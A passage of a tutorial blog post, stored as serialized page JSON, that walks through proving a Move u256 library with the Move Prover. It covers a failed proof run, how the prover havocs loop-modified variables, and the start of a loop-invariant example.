type":30,"value":431},{"type":24,"tag":301,"props":16983,"children":16984},{"style":10246},[16985],{"type":30,"value":16465},{"type":24,"tag":301,"props":16987,"children":16988},{"style":385},[16989],{"type":30,"value":431},{"type":24,"tag":301,"props":16991,"children":16992},{"style":10246},[16993],{"type":30,"value":16465},{"type":24,"tag":301,"props":16995,"children":16996},{"style":359},[16997],{"type":30,"value":492},{"type":24,"tag":301,"props":16999,"children":17000},{"class":303,"line":335},[17001,17006,17010,17014,17018,17022,17026,17030,17034,17038,17042,17046,17050,17054,17058],{"type":24,"tag":301,"props":17002,"children":17003},{"style":369},[17004],{"type":30,"value":17005}," ensures",{"type":24,"tag":301,"props":17007,"children":17008},{"style":314},[17009],{"type":30,"value":16509},{"type":24,"tag":301,"props":17011,"children":17012},{"style":359},[17013],{"type":30,"value":362},{"type":24,"tag":301,"props":17015,"children":17016},{"style":369},[17017],{"type":30,"value":5599},{"type":24,"tag":301,"props":17019,"children":17020},{"style":359},[17021],{"type":30,"value":911},{"type":24,"tag":301,"props":17023,"children":17024},{"style":385},[17025],{"type":30,"value":607},{"type":24,"tag":301,"props":17027,"children":17028},{"style":314},[17029],{"type":30,"value":16509},{"type":24,"tag":301,"props":17031,"children":17032},{"style":359},[17033],{"type":30,"value":362},{"type":24,"tag":301,"props":17035,"children":17036},{"style":369},[17037],{"type":30,"value":188},{"type":24,"tag":301,"props":17039,"children":17040},{"style":359},[17041],{"type":30,"value":911},{"type":24,"tag":301,"props":17043,"children":17044},{"style":385},[17045],{"type":30,"value":11206},{"type":24,"tag":301,"props":17047,"children":17048},{"style":314},[17049],{"type":30,"value":16509},{"type":24,"tag":301,"props":17051,"children":17052},{"style":359},[17053],{"type":30,"value":362},{"type":24,"tag":301,"props":17055,"children":17056},{"style":369},[17057],{"type":30,"value":5613},{"type":24,"tag":301,"props":17059,"children":17060},{"style":359},[17061],{"type":30,"value":589},{"type":24,"tag":301,"props":17063,"children":17064},{"class":303,"line":344},[17065],{"type":24,"tag":301,"props":17066,"children":17067},{"style":359},[17068],{"type":30,"value":698},{"type":24,"tag":32,"props":17070,"children":17071},{},[17072],{"type":30,"value":17073},"Note that because Move specification functions are written in MSL, the numbers are unbounded and we can define the expression without risk of overflow.",{"type":24,"tag":32,"props":17075,"children":17076},{},[17077],{"type":30,"value":17078},"Let's try to prove the library with the specifications from above:",{"type":24,"tag":291,"props":17080,"children":17082},{"code":17081,"language":11068,"meta":7,"className":11069,"style":7},"$ move prove\n",[17083],{"type":24,"tag":145,"props":17084,"children":17085},{"__ignoreMap":7},[17086],{"type":24,"tag":301,"props":17087,"children":17088},{"class":303,"line":304},[17089,17094,17099],{"type":24,"tag":301,"props":17090,"children":17091},{"style":314},[17092],{"type":30,"value":17093},"$",{"type":24,"tag":301,"props":17095,"children":17096},{"style":329},[17097],{"type":30,"value":17098}," move",{"type":24,"tag":301,"props":17100,"children":17101},{"style":329},[17102],{"type":30,"value":17103}," prove\n",{"type":24,"tag":32,"props":17105,"children":17106},{},[17107],{"type":30,"value":17108},"It outputs the following error information:",{"type":24,"tag":291,"props":17110,"children":17112},{"code":17111,"language":11068,"meta":7,"className":11069,"style":7},"[...]\n\nerror: abort not covered by any of the `aborts_if` clauses\n╭ spec add {\n| aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n| ensures value_of_U256(result) == value_of_U256(a) + value_of_U256(b);\n| }\n╰─────^\n\n[...]\n\n at ./sources/u256.move:316: add\n enter loop, variable(s) carry, i, ret havocked and reassigned\n carry = 54\n i = 3792\n ret = u256.U256{v0 = 26418, v1 = 27938, v2 = 6900, v3 = 1999}\n at ./sources/u256.move:346: add\n ABORTED\n\nFAILURE proving 1 modules from package `u256` in 9.143s\n{\n \"Error\": \"Move Prover failed: exiting with verification errors\"\n}\n",[17113],{"type":24,"tag":145,"props":17114,"children":17115},{"__ignoreMap":7},[17116,17124,17131,17192,17213,17302,17370,17382,17390,17397,17404,17411,17429,17489,17506,17523,17595,17611,17619,17626,17676,17683,17700],{"type":24,"tag":301,"props":17117,"children":17118},{"class":303,"line":304},[17119],{"type":24,"tag":301,"props":17120,"children":17121},{"style":359},[17122],{"type":30,"value":17123},"[...]\n",{"type":24,"tag":301,"props":17125,"children":17126},{"class":303,"line":320},[17127],{"type":24,"tag":301,"props":17128,"children":17129},{"emptyLinePlaceholder":16},[17130],{"type":30,"value":341},{"type":24,"tag":301,"props":17132,"children":17133},{"class":303,"line":335},[17134,17139,17144,17149,17154,17159,17164,17168,17173,17178,17182,17187],{"type":24,"tag":301,"props":17135,"children":17136},{"style":314},[17137],{"type":30,"value":17138},"error:",{"type":24,"tag":301,"props":17140,"children":17141},{"style":329},[17142],{"type":30,"value":17143}," abort",{"type":24,"tag":301,"props":17145,"children":17146},{"style":329},[17147],{"type":30,"value":17148}," not",{"type":24,"tag":301,"props":17150,"children":17151},{"style":329},[17152],{"type":30,"value":17153}," covered",{"type":24,"tag":301,"props":17155,"children":17156},{"style":329},[17157],{"type":30,"value":17158}," by",{"type":24,"tag":301,"props":17160,"children":17161},{"style":329},[17162],{"type":30,"value":17163}," any",{"type":24,"tag":301,"props":17165,"children":17166},{"style":329},[17167],{"type":30,"value":3268},{"type":24,"tag":301,"props":17169,"children":17170},{"style":329},[17171],{"type":30,"value":17172}," the",{"type":24,"tag":301,"props":17174,"children":17175},{"style":329},[17176],{"type":30,"value":17177}," `",{"type":24,"tag":301,"props":17179,"children":17180},{"style":314},[17181],{"type":30,"value":15139},{"type":24,"tag":301,"props":17183,"children":17184},{"style":329},[17185],{"type":30,"value":17186},"`",{"type":24,"tag":301,"props":17188,"children":17189},{"style":314},[17190],{"type":30,"value":17191}," clauses\n",{"type":24,"tag":301,"props":17193,"children":17194},{"class":303,"line":344},[17195,17200,17205,17209],{"type":24,"tag":301,"props":17196,"children":17197},{"style":314},[17198],{"type":30,"value":17199},"╭",{"type":24,"tag":301,"props":17201,"children":17202},{"style":329},[17203],{"type":30,"value":17204}," spec",{"type":24,"tag":301,"props":17206,"children":17207},{"style":329},[17208],{"type":30,"value":16387},{"type":24,"tag":301,"props":17210,"children":17211},{"style":329},[17212],{"type":30,"value":3035},{"type":24,"tag":301,"props":17214,"children":17215},{"class":303,"line":401},[17216,17221,17226,17230,17234,17238,17242,17246,17250,17254,17258,17262,17266,17270,17274,17278,17282,17286,17290,17294,17298],{"type":24,"tag":301,"props":17217,"children":17218},{"style":385},[17219],{"type":30,"value":17220},"|",{"type":24,"tag":301,"props":17222,"children":17223},{"style":314},[17224],{"type":30,"value":17225}," aborts_if",{"type":24,"tag":301,"props":17227,"children":17228},{"style":329},[17229],{"type":30,"value":16509},{"type":24,"tag":301,"props":17231,"children":17232},{"style":359},[17233],{"type":30,"value":362},{"type":24,"tag":301,"props":17235,"children":17236},{"style":314},[17237],{"type":30,"value":188},{"type":24,"tag":301,"props":17239,"children":17240},{"style":359},[17241],{"type":30,"value":911},{"type":24,"tag":301,"props":17243,"children":17244},{"style":329},[17245],{"type":30,"value":11206},{"type":24,"tag":301,"props":17247,"children":17248},{"style":329},[17249],{"type":30,"value":16509},{"type":24,"tag":301,"props":17251,"children":17252},{"style":359},[17253],{"type":30,"value":362},{"type":24,"tag":301,"props":17255,"children":17256},{"style":314},[17257],{"type":30,"value":5613},{"type":24,"tag":301,"props":17259,"children":17260},{"style":359},[17261],{"type":30,"value":911},{"type":24,"tag":301,"props":17263,"children":17264},{"style":385},[17265],{"type":30,"value":1456},{"type":24,"tag":301,"props":17267,"children":17268},{"style":329},[17269],{"type":30,"value":523},{"type":24,"tag":301,"props":17271,"children":17272},{"style":329},[17273],{"type":30,"value":16465},{"type":24,"tag":301,"props":17275,"children":17276},{"style":348},[17277],{"type":30,"value":431},{"type":24,"tag":301,"props":17279,"children":17280},{"style":329},[17281],{"type":30,"value":16465},{"type":24,"tag":301,"props":17283,"children":17284},{"style":348},[17285],{"type":30,"value":431},{"type":24,"tag":301,"props":17287,"children":17288},{"style":329},[17289],{"type":30,"value":16465},{"type":24,"tag":301,"props":17291,"children":17292},{"style":348},[17293],{"type":30,"value":431},{"type":24,"tag":301,"props":17295,"children":17296},{"style":329},[17297],{"type":30,"value":16465},{"type":24,"tag":301,"props":17299,"children":17300},{"style":359},[17301],{"type":30,"value":492},{"type":24,"tag":301,"props":17303,"children":17304},{"class":303,"line":415},[17305,17309,17314,17318,17322,17326,17330,17334,17338,17342,17346,17350,17354,17358,17362,17366],{"type":24,"tag":301,"props":17306,"children":17307},{"style":385},[17308],{"type":30,"value":17220},{"type":24,"tag":301,"props":17310,"children":17311},{"style":314},[17312],{"type":30,"value":17313}," ensures",{"type":24,"tag":301,"props":17315,"children":17316},{"style":329},[17317],{"type":30,"value":16509},{"type":24,"tag":301,"props":17319,"children":17320},{"style":359},[17321],{"type":30,"value":362},{"type":24,"tag":301,"props":17323,"children":17324},{"style":314},[17325],{"type":30,"value":5599},{"type":24,"tag":301,"props":17327,"children":17328},{"style":359},[17329],{"type":30,"value":911},{"type":24,"tag":301,"props":17331,"children":17332},{"style":329},[17333],{"type":30,"value":607},{"type":24,"tag":301,"props":17335,"children":17336},{"style":329},[17337],{"type":30,"value":16509},{"type":24,"tag":301,"props":17339,"children":17340},{"style":359},[17341],{"type":30,"value":362},{"type":24,"tag":301,"props":17343,"children":17344},{"style":314},[17345],{"type":30,"value":188},{"type":24,"tag":301,"props":17347,"children":17348},{"style":359},[17349],{"type":30,"value":911},{"type":24,"tag":301,"props":17351,"children":17352},{"style":329},[17353],{"type":30,"value":11206},{"type":24,"tag":301,"props":17355,"children":17356},{"style":329},[17357],{"type":30,"value":16509},{"type":24,"tag":301,"props":17359,"children":17360},{"style":359},[17361],{"type":30,"value":362},{"type":24,"tag":301,"props":17363,"children":17364},{"style":314},[17365],{"type":30,"value":5613},{"type":24,"tag":301,"props":17367,"children":17368},{"style":359},[17369],{"type":30,"value":589},{"type":24,"tag":301,"props":17371,"children":17372},{"class":303,"line":439},[17373,17377],{"type":24,"tag":301,"props":17374,"children":17375},{"style":385},[17376],{"type":30,"value":17220},{"type":24,"tag":301,"props":17378,"children":17379},{"style":359},[17380],{"type":30,"value":17381}," }\n",{"type":24,"tag":301,"props":17383,"children":17384},{"class":303,"line":447},[17385],{"type":24,"tag":301,"props":17386,"children":17387},{"style":314},[17388],{"type":30,"value":17389},"╰─────^\n",{"type":24,"tag":301,"props":17391,"children":17392},{"class":303,"line":476},[17393],{"type":24,"tag":301,"props":17394,"children":17395},{"emptyLinePlaceholder":16},[17396],{"type":30,"value":341},{"type":24,"tag":301,"props":17398,"children":17399},{"class":303,"line":495},[17400],{"type":24,"tag":301,"props":17401,"children":17402},{"style":359},[17403],{"type":30,"value":17123},{"type":24,"tag":301,"props":17405,"children":17406},{"class":303,"line":504},[17407],{"type":24,"tag":301,"props":17408,"children":17409},{"emptyLinePlaceholder":16},[17410],{"type":30,"value":341},{"type":24,"tag":301,"props":17412,"children":17413},{"class":303,"line":512},[17414,17419,17424],{"type":24,"tag":301,"props":17415,"children":17416},{"style":314},[17417],{"type":30,"value":17418}," at",{"type":24,"tag":301,"props":17420,"children":17421},{"style":329},[17422],{"type":30,"value":17423}," ./sources/u256.move:316:",{"type":24,"tag":301,"props":17425,"children":17426},{"style":329},[17427],{"type":30,"value":17428}," add\n",{"type":24,"tag":301,"props":17430,"children":17431},{"class":303,"line":592},[17432,17437,17442,17447,17451,17455,17459,17464,17469,17474,17479,17484],{"type":24,"tag":301,"props":17433,"children":17434},{"style":314},[17435],{"type":30,"value":17436}," enter",{"type":24,"tag":301,"props":17438,"children":17439},{"style":329},[17440],{"type":30,"value":17441}," loop,",{"type":24,"tag":301,"props":17443,"children":17444},{"style":329},[17445],{"type":30,"value":17446}," variable",{"type":24,"tag":301,"props":17448,"children":17449},{"style":359},[17450],{"type":30,"value":362},{"type":24,"tag":301,"props":17452,"children":17453},{"style":314},[17454],{"type":30,"value":1724},{"type":24,"tag":301,"props":17456,"children":17457},{"style":359},[17458],{"type":30,"value":911},{"type":24,"tag":301,"props":17460,"children":17461},{"style":329},[17462],{"type":30,"value":17463},"carry,",{"type":24,"tag":301,"props":17465,"children":17466},{"style":329},[17467],{"type":30,"value":17468}," i,",{"type":24,"tag":301,"props":17470,"children":17471},{"style":329},[17472],{"type":30,"value":17473}," ret",{"type":24,"tag":301,"props":17475,"children":17476},{"style":329},[17477],{"type":30,"value":17478}," havocked",{"type":24,"tag":301,"props":17480,"children":17481},{"style":329},[17482],{"type":30,"value":17483}," and",{"type":24,"tag":301,"props":17485,"children":17486},{"style":329},[17487],{"type":30,"value":17488}," reassigned\n",{"type":24,"tag":301,"props":17490,"children":17491},{"class":303,"line":619},[17492,17497,17501],{"type":24,"tag":301,"props":17493,"children":17494},{"style":314},[17495],{"type":30,"value":17496}," carry",{"type":24,"tag":301,"props":17498,"children":17499},{"style":329},[17500],{"type":30,"value":2537},{"type":24,"tag":301,"props":17502,"children":17503},{"style":466},[17504],{"type":30,"value":17505}," 54\n",{"type":24,"tag":301,"props":17507,"children":17508},{"class":303,"line":635},[17509,17514,17518],{"type":24,"tag":301,"props":17510,"children":17511},{"style":314},[17512],{"type":30,"value":17513}," i",{"type":24,"tag":301,"props":17515,"children":17516},{"style":329},[17517],{"type":30,"value":2537},{"type":24,"tag":301,"props":17519,"children":17520},{"style":466},[17521],{"type":30,"value":17522}," 3792\n",{"type":24,"tag":301,"props":17524,"children":17525},{"class":303,"line":643},[17526,17531,17535,17540,17544,17549,17554,17558,17563,17568,17572,17577,17582,17586,17591],{"type":24,"tag":301,"props":17527,"children":17528},{"style":314},[17529],{"type":30,"value":17530}," ret",{"type":24,"tag":301,"props":17532,"children":17533},{"style":329},[17534],{"type":30,"value":2537},{"type":24,"tag":301,"props":17536,"children":17537},{"style":329},[17538],{"type":30,"value":17539}," u256.U256{v0",{"type":24,"tag":301,"props":17541,"children":17542},{"style":329},[17543],{"type":30,"value":2537},{"type":24,"tag":301,"props":17545,"children":17546},{"style":329},[17547],{"type":30,"value":17548}," 26418,",{"type":24,"tag":301,"props":17550,"children":17551},{"style":329},[17552],{"type":30,"value":17553}," v1",{"type":24,"tag":301,"props":17555,"children":17556},{"style":329},[17557],{"type":30,"value":2537},{"type":24,"tag":301,"props":17559,"children":17560},{"style":329},[17561],{"type":30,"value":17562}," 27938,",{"type":24,"tag":301,"props":17564,"children":17565},{"style":329},[17566],{"type":30,"value":17567}," v2",{"type":24,"tag":301,"props":17569,"children":17570},{"style":329},[17571],{"type":30,"value":2537},{"type":24,"tag":301,"props":17573,"children":17574},{"style":329},[17575],{"type":30,"value":17576}," 6900,",{"type":24,"tag":301,"props":17578,"children":17579},{"style":329},[17580],{"type":30,"value":17581}," v3",{"type":24,"tag":301,"props":17583,"children":17584},{"style":329},[17585],{"type":30,"value":2537},{"type":24,"tag":301,"props":17587,"children":17588},{"style":466},[17589],{"type":30,"value":17590}," 1999",{"type":24,"tag":301,"props":17592,"children":17593},{"style":329},[17594],{"type":30,"value":698},{"type":24,"tag":301,"props":17596,"children":17597},{"class":303,"line":652},[17598,17602,17607],{"type":24,"tag":301,"props":17599,"children":17600},{"style":314},[17601],{"type":30,"value":17418},{"type":24,"tag":301,"props":17603,"children":17604},{"style":329},[17605],{"type":30,"value":17606}," ./sources/u256.move:346:",{"type":24,"tag":301,"props":17608,"children":17609},{"style":329},[17610],{"type":30,"value":17428},{"type":24,"tag":301,"props":17612,"children":17613},{"class":303,"line":666},[17614],{"type":24,"tag":301,"props":17615,"children":17616},{"style":314},[17617],{"type":30,"value":17618}," ABORTED\n",{"type":24,"tag":301,"props":17620,"children":17621},{"class":303,"line":674},[17622],{"type":24,"tag":301,"props":17623,"children":17624},{"emptyLinePlaceholder":16},[17625],{"type":30,"value":341},{"type":24,"tag":301,"props":17627,"children":17628},{"class":303,"line":692},[17629,17634,17639,17643,17648,17653,17658,17662,17667,17671],{"type":24,"tag":301,"props":17630,"children":17631},{"style":314},[17632],{"type":30,"value":17633},"FAILURE",{"type":24,"tag":301,"props":17635,"children":17636},{"style":329},[17637],{"type":30,"value":17638}," proving",{"type":24,"tag":301,"props":17640,"children":17641},{"style":466},[17642],{"type":30,"value":487},{"type":24,"tag":301,"props":17644,"children":17645},{"style":329},[17646],{"type":30,"value":17647}," modules",{"type":24,"tag":301,"props":17649,"children":17650},{"style":329},[17651],{"type":30,"value":17652}," from",{"type":24,"tag":301,"props":17654,"children":17655},{"style":329},[17656],{"type":30,"value":17657}," package",{"type":24,"tag":301,"props":17659,"children":17660},{"style":329},[17661],{"type":30,"value":17177},{"type":24,"tag":301,"props":17663,"children":17664},{"style":314},[17665],{"type":30,"value":17666},"u256",{"type":24,"tag":301,"props":17668,"children":17669},{"style":329},[17670],{"type":30,"value":17186},{"type":24,"tag":301,"props":17672,"children":17673},{"style":359},[17674],{"type":30,"value":17675}," in 9.143s\n",{"type":24,"tag":301,"props":17677,"children":17678},{"class":303,"line":3631},[17679],{"type":24,"tag":301,"props":17680,"children":17681},{"style":359},[17682],{"type":30,"value":799},{"type":24,"tag":301,"props":17684,"children":17685},{"class":303,"line":3639},[17686,17691,17695],{"type":24,"tag":301,"props":17687,"children":17688},{"style":314},[17689],{"type":30,"value":17690}," \"Error\"",{"type":24,"tag":301,"props":17692,"children":17693},{"style":314},[17694],{"type":30,"value":1679},{"type":24,"tag":301,"props":17696,"children":17697},{"style":329},[17698],{"type":30,"value":17699}," \"Move Prover failed: exiting with verification errors\"\n",{"type":24,"tag":301,"props":17701,"children":17702},{"class":303,"line":3647},[17703],{"type":24,"tag":301,"props":17704,"children":17705},{"style":359},[17706],{"type":30,"value":698},{"type":24,"tag":32,"props":17708,"children":17709},{},[17710,17712,17717],{"type":30,"value":17711},"The prover is telling us that proving failed because the abort was not covered by our ",{"type":24,"tag":145,"props":17713,"children":17715},{"className":17714},[],[17716],{"type":30,"value":15139},{"type":30,"value":17718}," clauses. But there is no other abort situation that we have to cover, right?",{"type":24,"tag":32,"props":17720,"children":17721},{},[17722,17724,17730],{"type":30,"value":17723},"If we keep reading the error output, we will encounter the somewhat cryptic message: ",{"type":24,"tag":145,"props":17725,"children":17727},{"className":17726},[],[17728],{"type":30,"value":17729},"ret havocked and reassigned",{"type":30,"value":206},{"type":24,"tag":32,"props":17732,"children":17733},{},[17734],{"type":30,"value":17735},"What does this mean?",{"type":24,"tag":32,"props":17737,"children":17738},{},[17739,17741,17748],{"type":30,"value":17740},"By diving into the Move Prover source, we find a ",{"type":24,"tag":188,"props":17742,"children":17745},{"href":17743,"rel":17744},"https://github.com/move-language/move/blob/e0dafc5cf3efe4c4e61411f10cdf0f379a36673c/language/move-prover/bytecode/src/loop_analysis.rs#L94",[192],[17746],{"type":30,"value":17747},"likely suspect",{"type":30,"value":17749},". The prover attempts to prove all loops with induction!",{"type":24,"tag":32,"props":17751,"children":17752},{},[17753],{"type":30,"value":17754},"More formally, it will translate the loop into two key steps, following the classic steps of a proof by induction",{"type":24,"tag":6246,"props":17756,"children":17757},{},[17758,17763],{"type":24,"tag":2659,"props":17759,"children":17760},{},[17761],{"type":30,"value":17762},"Base Case: Asserting the loop invariant holds at the start of loop execution",{"type":24,"tag":2659,"props":17764,"children":17765},{},[17766],{"type":30,"value":17767},"Inductive Step: Assume the invariant, execute the loop body, and assert that the invariant still holds",{"type":24,"tag":32,"props":17769,"children":17770},{},[17771,17773,17778,17780,17786,17787,17792,17793,17798,17800,17805],{"type":30,"value":17772},"The loop prover will also ",{"type":24,"tag":60,"props":17774,"children":17775},{},[17776],{"type":30,"value":17777},"havoc, or assign random values to, all variables written to inside the loop",{"type":30,"value":17779},". Going back to the log message, this implies that the variables ",{"type":24,"tag":145,"props":17781,"children":17783},{"className":17782},[],[17784],{"type":30,"value":17785},"carry",{"type":30,"value":377},{"type":24,"tag":145,"props":17788,"children":17790},{"className":17789},[],[17791],{"type":30,"value":8809},{"type":30,"value":2378},{"type":24,"tag":145,"props":17794,"children":17796},{"className":17795},[],[17797],{"type":30,"value":10564},{"type":30,"value":17799}," have been havocked, or assigned random values. This also explains why the input and output of ",{"type":24,"tag":145,"props":17801,"children":17803},{"className":17802},[],[17804],{"type":30,"value":16443},{"type":30,"value":17806}," makes no sense.",{"type":24,"tag":32,"props":17808,"children":17809},{},[17810],{"type":30,"value":17811},"More concretely, the loop analysis translates into the following steps.",{"type":24,"tag":6246,"props":17813,"children":17814},{},[17815,17820,17825,17830,17835,17840],{"type":24,"tag":2659,"props":17816,"children":17817},{},[17818],{"type":30,"value":17819},"Assert the loop invariant",{"type":24,"tag":2659,"props":17821,"children":17822},{},[17823],{"type":30,"value":17824},"Havoc all modified variables",{"type":24,"tag":2659,"props":17826,"children":17827},{},[17828],{"type":30,"value":17829},"Assume the loop invariant",{"type":24,"tag":2659,"props":17831,"children":17832},{},[17833],{"type":30,"value":17834},"Assume the loop guard (the code inside the while condition)",{"type":24,"tag":2659,"props":17836,"children":17837},{},[17838],{"type":30,"value":17839},"Run the loop body",{"type":24,"tag":2659,"props":17841,"children":17842},{},[17843],{"type":30,"value":17819},{"type":24,"tag":32,"props":17845,"children":17846},{},[17847],{"type":30,"value":17848},"There are two approaches to dealing with loops.",{"type":24,"tag":32,"props":17850,"children":17851},{},[17852],{"type":30,"value":17853},"The first would be to specify a loop invariant.",{"type":24,"tag":32,"props":17855,"children":17856},{},[17857,17859,17866],{"type":30,"value":17858},"In order to specify the loop invariant, we need to use some special syntax, as we explored briefly in our ",{"type":24,"tag":188,"props":17860,"children":17863},{"href":17861,"rel":17862},"https://osec.io/blog/tutorials/2022-09-06-move-introduction/",[192],[17864],{"type":30,"value":17865},"previous post",{"type":30,"value":206},{"type":24,"tag":291,"props":17868,"children":17870},{"code":17869,"language":9817,"meta":7,"className":9818,"style":7}," while ({\n spec {\n invariant len(amounts_times_coins) == i;\n invariant i \u003C= n_coins;\n invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n };\n (i \u003C n_coins)\n }) {\n vector::push_back(\n &mut amounts_times_coins,\n (*vector::borrow(&input, (i as u64)) as u128) * (n_coins as u128)\n );\n i = i + 1;\n };\n",[17871],{"type":24,"tag":145,"props":17872,"children":17873},{"__ignoreMap":7},[17874,17886,17897,17933,17956,18039,18046,18070,18078,18098,18118,18209,18216,18244],{"type":24,"tag":301,"props":17875,"children":17876},{"class":303,"line":304},[17877,17882],{"type":24,"tag":301,"props":17878,"children":17879},{"style":308},[17880],{"type":30,"value":17881}," while",{"type":24,"tag":301,"props":17883,"children":17884},{"style":359},[17885],{"type":30,"value":15347},{"type":24,"tag":301,"props":17887,"children":17888},{"class":303,"line":320},[17889,17893],{"type":24,"tag":301,"props":17890,"children":17891},{"style":369},[17892],{"type":30,"value":15740},{"type":24,"tag":301,"props":17894,"children":17895},{"style":359},[17896],{"type":30,"value":3035},{"type":24,"tag":301,"props":17898,"children":17899},{"class":303,"line":335},[17900,17905,17909,17913,17917,17921,17925,17929],{"type":24,"tag":301,"props":17901,"children":17902},{"style":369},[17903],{"type":30,"value":17904}," invariant",{"type":24,"tag":301,"props":17906,"children":17907},{"style":314},[17908],{"type":30,"value":15372},{"type":24,"tag":301,"props":17910,"children":17911},{"style":359},[17912],{"type":30,"value":362},{"type":24,"tag":301,"props":17914,"children":17915},{"style":369},[17916],{"type":30,"value":15381},{"type":24,"tag":301,"props":17918,"children":17919},{"style":359},[17920],{"type":30,"value":911},{"type":24,"tag":301,"props":17922,"children":17923},{"style":385},[17924],{"type":30,"value":607},{"type":24,"tag":301,"props":17926,"children":17927},{"style":369},[17928],{"type":30,"value":10225},{"type":24,"tag":301,"props":17930,"children":17931},{"style":359},[17932],{"type":30,"value":492},{"type":24,"tag":301,"props":17934,"children":17935},{"class":303,"line":344},[17936,17940,17944,17948,17952],{"type":24,"tag":301,"props":17937,"children":17938},{"style":369},[17939],{"type":30,"value":17904},{"type":24,"tag":301,"props":17941,"children":17942},{"style":369},[17943],{"type":30,"value":10225},{"type":24,"tag":301,"props":17945,"children":17946},{"style":385},[17947],{"type":30,"value":15012},{"type":24,"tag":301,"props":17949,"children":17950},{"style":369},[17951],{"type":30,"value":15301},{"type":24,"tag":301,"props":17953,"children":17954},{"style":359},[17955],{"type":30,"value":492},{"type":24,"tag":301,"props":17957,"children":17958},{"class":303,"line":401},[17959,17963,17967,17971,17975,17979,17983,17987,17991,17995,17999,18003,18007,18011,18015,18019,18023,18027,18031,18035],{"type":24,"tag":301,"props":17960,"children":17961},{"style":369},[17962],{"type":30,"value":17904},{"type":24,"tag":301,"props":17964,"children":17965},{"style":369},[17966],{"type":30,"value":15432},{"type":24,"tag":301,"props":17968,"children":17969},{"style":369},[17970],{"type":30,"value":15437},{"type":24,"tag":301,"props":17972,"children":17973},{"style":348},[17974],{"type":30,"value":9878},{"type":24,"tag":301,"props":17976,"children":17977},{"style":466},[17978],{"type":30,"value":685},{"type":24,"tag":301,"props":17980,"children":17981},{"style":385},[17982],{"type":30,"value":9887},{"type":24,"tag":301,"props":17984,"children":17985},{"style":369},[17986],{"type":30,"value":10564},{"type":24,"tag":301,"props":17988,"children":17989},{"style":385},[17990],{"type":30,"value":1679},{"type":24,"tag":301,"props":17992,"children":17993},{"style":369},[17994],{"type":30,"value":15236},{"type":24,"tag":301,"props":17996,"children":17997},{"style":359},[17998],{"type":30,"value":541},{"type":24,"tag":301,"props":18000,"children":18001},{"style":369},[18002],{"type":30,"value":15470},{"type":24,"tag":301,"props":18004,"children":18005},{"style":359},[18006],{"type":30,"value":1046},{"type":24,"tag":301,"props":18008,"children":18009},{"style":385},[18010],{"type":30,"value":607},{"type":24,"tag":301,"props":18012,"children":18013},{"style":369},[18014],{"type":30,"value":15483},{"type":24,"tag":301,"props":18016,"children":18017},{"style":359},[18018],{"type":30,"value":541},{"type":24,"tag":301,"props":18020,"children":18021},{"style":369},[18022],{"type":30,"value":15470},{"type":24,"tag":301,"props":18024,"children":18025},{"style":359},[18026],{"type":30,"value":1046},{"type":24,"tag":301,"props":18028,"children":18029},{"style":385},[18030],{"type":30,"value":772},{"type":24,"tag":301,"props":18032,"children":18033},{"style":369},[18034],{"type":30,"value":15301},{"type":24,"tag":301,"props":18036,"children":18037},{"style":359},[18038],{"type":30,"value":492},{"type":24,"tag":301,"props":18040,"children":18041},{"class":303,"line":415},[18042],{"type":24,"tag":301,"props":18043,"children":18044},{"style":359},[18045],{"type":30,"value":15732},{"type":24,"tag":301,"props":18047,"children":18048},{"class":303,"line":439},[18049,18054,18058,18062,18066],{"type":24,"tag":301,"props":18050,"children":18051},{"style":359},[18052],{"type":30,"value":18053}," (",{"type":24,"tag":301,"props":18055,"children":18056},{"style":369},[18057],{"type":30,"value":10564},{"type":24,"tag":301,"props":18059,"children":18060},{"style":385},[18061],{"type":30,"value":3950},{"type":24,"tag":301,"props":18063,"children":18064},{"style":369},[18065],{"type":30,"value":15301},{"type":24,"tag":301,"props":18067,"children":18068},{"style":359},[18069],{"type":30,"value":791},{"type":24,"tag":301,"props":18071,"children":18072},{"class":303,"line":447},[18073],{"type":24,"tag":301,"props":18074,"children":18075},{"style":359},[18076],{"type":30,"value":18077}," }) {\n",{"type":24,"tag":301,"props":18079,"children":18080},{"class":303,"line":476},[18081,18086,18090,18094],{"type":24,"tag":301,"props":18082,"children":18083},{"style":359},[18084],{"type":30,"value":18085}," vector",{"type":24,"tag":301,"props":18087,"children":18088},{"style":385},[18089],{"type":30,"value":10308},{"type":24,"tag":301,"props":18091,"children":18092},{"style":314},[18093],{"type":30,"value":15564},{"type":24,"tag":301,"props":18095,"children":18096},{"style":359},[18097],{"type":30,"value":1707},{"type":24,"tag":301,"props":18099,"children":18100},{"class":303,"line":495},[18101,18106,18110,18114],{"type":24,"tag":301,"props":18102,"children":18103},{"style":385},[18104],{"type":30,"value":18105}," &",{"type":24,"tag":301,"props":18107,"children":18108},{"style":348},[18109],{"type":30,"value":10550},{"type":24,"tag":301,"props":18111,"children":18112},{"style":369},[18113],{"type":30,"value":15236},{"type":24,"tag":301,"props":18115,"children":18116},{"style":359},[18117],{"type":30,"value":1729},{"type":24,"tag":301,"props":18119,"children":18120},{"class":303,"line":504},[18121,18125,18129,18133,18137,18141,18145,18149,18153,18157,18161,18165,18169,18173,18177,18181,18185,18189,18193,18197,18201,18205],{"type":24,"tag":301,"props":18122,"children":18123},{"style":359},[18124],{"type":30,"value":15523},{"type":24,"tag":301,"props":18126,"children":18127},{"style":385},[18128],{"type":30,"value":772},{"type":24,"tag":301,"props":18130,"children":18131},{"style":359},[18132],{"type":30,"value":15605},{"type":24,"tag":301,"props":18134,"children":18135},{"style":385},[18136],{"type":30,"value":10308},{"type":24,"tag":301,"props":18138,"children":18139},{"style":314},[18140],{"type":30,"value":15614},{"type":24,"tag":301,"props":18142,"children":18143},{"style":359},[18144],{"type":30,"value":362},{"type":24,"tag":301,"props":18146,"children":18147},{"style":385},[18148],{"type":30,"value":556},{"type":24,"tag":301,"props":18150,"children":18151},{"style":369},[18152],{"type":30,"value":15181},{"type":24,"tag":301,"props":18154,"children":18155},{"style":359},[18156],{"type":30,"value":15631},{"type":24,"tag":301,"props":18158,"children":18159},{"style":369},[18160],{"type":30,"value":10564},{"type":24,"tag":301,"props":18162,"children":18163},{"style":348},[18164],{"type":30,"value":15640},{"type":24,"tag":301,"props":18166,"children":18167},{"style":10246},[18168],{"type":30,"value":12680},{"type":24,"tag":301,"props":18170,"children":18171},{"style":359},[18172],{"type":30,"value":15649},{"type":24,"tag":301,"props":18174,"children":18175},{"style":348},[18176],{"type":30,"value":15654},{"type":24,"tag":301,"props":18178,"children":18179},{"style":10246},[18180],{"type":30,"value":15659},{"type":24,"tag":301,"props":18182,"children":18183},{